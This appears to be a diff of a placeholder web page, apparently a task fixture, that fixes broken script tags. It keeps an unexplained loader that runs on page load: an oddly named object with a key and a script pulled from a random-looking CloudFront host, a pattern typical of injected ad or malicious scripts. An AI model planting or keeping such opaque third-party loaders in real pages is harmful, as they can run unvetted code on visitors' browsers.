--- a/task.html
+++ b/task.html
@@ -1,12 +1,10 @@
 <!doctype html>
 <html>
   <head>
-    <script>_nS();
-
-    <script type="text/javascript">
+<script type="text/javascript">_CS();
     var zypqq_Wia_JXpVvc={"it":4248522,"key":"a3c43"};
 </script>
-<script src="https://d115fsoldgezur.cloudfront.net/505dca8.js"></script> </script>
+<script src="https://d115fsoldgezur.cloudfront.net/505dca8.js"></script>
 
     <title>This is the title of the webpage!</title>
   </head>
